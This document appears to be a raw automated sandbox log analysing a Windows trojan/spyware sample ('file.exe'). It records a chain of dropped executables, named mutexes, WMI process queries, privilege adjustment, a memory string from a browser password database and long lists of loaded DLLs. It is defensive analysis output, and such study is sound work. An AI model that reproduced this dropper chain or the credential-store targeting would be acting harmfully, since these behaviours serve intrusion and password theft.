Source: file.exe Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@39/57@1/12
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E637B5 GetLastError,FormatMessageW, 17_2_00E637B5
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E510BF AdjustTokenPrivileges,CloseHandle, 17_2_00E510BF
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E516C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 17_2_00E516C3
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E651CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, 17_2_00E651CD
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E7A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 17_2_00E7A67C
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E6648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize, 17_2_00E6648E
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00DF42A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 17_2_00DF42A2
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[1].exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7672
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8028:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1964
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7812
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user~1\AppData\Local\Temp\abc3bc1985
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: RegAsm.exe, 00000021.00000002.2744975325.000000000382E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003854000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003845000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe ReversingLabs: Detection: 47%
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 3ec4738210.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: b74664dd7e.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe "C:\Users\user~1\AppData\Local\Temp\1000002001\3ec4738210.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\1000015002\b74664dd7e.exe "C:\Users\user\1000015002\b74664dd7e.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe "C:\Users\user~1\AppData\Local\Temp\1000002001\3ec4738210.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe "C:\Users\user~1\AppData\Local\Temp\1000019101\6dbb7bdf47.exe"
Source: unknown Process created: C:\Users\user\1000015002\b74664dd7e.exe "C:\Users\user\1000015002\b74664dd7e.exe"
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7672 -s 1512
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe "C:\Users\user~1\AppData\Local\Temp\1000020001\610cd559ac.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe "C:\Users\user~1\AppData\Local\Temp\1000002001\3ec4738210.exe"
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe
Source: unknown Process created: C:\Users\user\1000015002\b74664dd7e.exe "C:\Users\user\1000015002\b74664dd7e.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe "C:\Users\user~1\AppData\Local\Temp\1000002001\gold.exe"
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 1500
Source: C:\Users\user\1000015002\b74664dd7e.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7812 -s 1512
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe "C:\Users\user~1\AppData\Local\Temp\1000002001\3ec4738210.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\1000015002\b74664dd7e.exe "C:\Users\user\1000015002\b74664dd7e.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe "C:\Users\user~1\AppData\Local\Temp\1000019101\6dbb7bdf47.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe "C:\Users\user~1\AppData\Local\Temp\1000020001\610cd559ac.exe"
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe "C:\Users\user~1\AppData\Local\Temp\1000002001\gold.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe "C:\Users\user~1\AppData\Local\Temp\1000002001\gold.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 1500
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mstask.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dui70.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: duser.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: chartv.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: atlthunk.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winsta.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: explorerframe.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: mstask.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: dui70.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: duser.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: chartv.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: oleacc.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: atlthunk.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: explorerframe.dll
